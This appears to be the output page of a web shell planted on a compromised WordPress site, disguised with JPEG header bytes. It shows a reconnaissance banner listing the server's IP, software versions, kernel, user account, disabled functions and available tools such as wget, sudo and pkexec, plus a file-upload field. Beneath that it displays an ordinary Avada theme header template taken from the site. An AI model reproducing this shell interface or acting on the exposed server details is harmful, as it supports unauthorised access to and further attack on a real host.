????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/themes/Avada/templates/ |
Upload File : |
<?php
// Do not allow directly accessing this file.
if ( ! defined( 'ABSPATH' ) ) {
exit( 'Direct script access denied.' );
}
?>
<?php
// The avada_before_header_wrapper hook.
do_action( 'avada_before_header_wrapper' );
$sticky_header_logo = ( Avada()->settings->get( 'sticky_header_logo' ) ) ? true : false;
$mobile_logo = ( Avada()->settings->get( 'mobile_logo' ) ) ? true : false;
?>
<div id="side-header-sticky"></div>
<div id="side-header" class="clearfix fusion-mobile-menu-design-<?php echo strtolower( Avada()->settings->get( 'mobile_menu_design' ) ); ?> fusion-sticky-logo-<?php echo $sticky_header_logo; ?> fusion-mobile-logo-<?php echo $mobile_logo; ?> fusion-sticky-menu-<?php echo has_nav_menu( 'sticky_navigation' ); ?><?php echo ( Avada()->settings->get( 'header_shadow' ) ) ? ' header-shadow' : ''; ?>">
<div class="side-header-wrapper">
<?php
// The avada_header_inner_before hook.
do_action( 'avada_header_inner_before' );
?>
<?php $mobile_logo = ( Avada()->settings->get( 'mobile_logo' ) ) ? true : false; ?>
<div class="side-header-content fusion-logo-<?php echo strtolower( Avada()->settings->get( 'logo_alignment' ) ); ?> fusion-mobile-logo-<?php echo $mobile_logo; ?>">
<?php avada_logo(); ?>
</div>
<div class="fusion-main-menu-container fusion-logo-menu-<?php echo strtolower( Avada()->settings->get( 'logo_alignment' ) ); ?>">
<?php avada_main_menu(); ?>
</div>
<?php if ( 'Tagline And Search' == Avada()->settings->get( 'header_v4_content' ) || 'Search' == Avada()->settings->get( 'header_v4_content' ) ) : ?>
<div class="fusion-secondary-menu-search">
<div class="fusion-secondary-menu-search-inner"><?php get_search_form(); ?></div>
</div>
<?php endif; ?>
<?php if ( 'Leave Empty' != Avada()->settings->get( 'header_left_content' ) || 'Leave Empty' != Avada()->settings->get( 'header_right_content' ) ) : ?>
<?php $content_1 = avada_secondary_header_content( 'header_left_content' ); ?>
<?php $content_2 = avada_secondary_header_content( 'header_right_content' ); ?>
<div class="side-header-content side-header-content-1-2">
<?php if ( $content_1 ) : ?>
<div class="side-header-content-1 fusion-clearfix"><?php echo $content_1; ?></div>
<?php endif; ?>
<?php if ( $content_2 ) : ?>
<div class="side-header-content-2 fusion-clearfix"><?php echo $content_2; ?></div>
<?php endif; ?>
</div>
<?php endif; ?>
<?php if ( 'None' != Avada()->settings->get( 'header_v4_content' ) ) : ?>
<div class="side-header-content side-header-content-3">
<?php avada_header_content_3(); ?>
</div>
<?php endif; ?>
<?php
// The avada_header_inner_after hook.
do_action( 'avada_header_inner_after' );
?>
</div>
<div class="side-header-background"></div>
<div class="side-header-border"></div>
</div>
<?php
// The avada_after_header_wrapper hook.
do_action( 'avada_after_header_wrapper' );
/* Omit closing PHP tag to avoid "Headers already sent" issues. */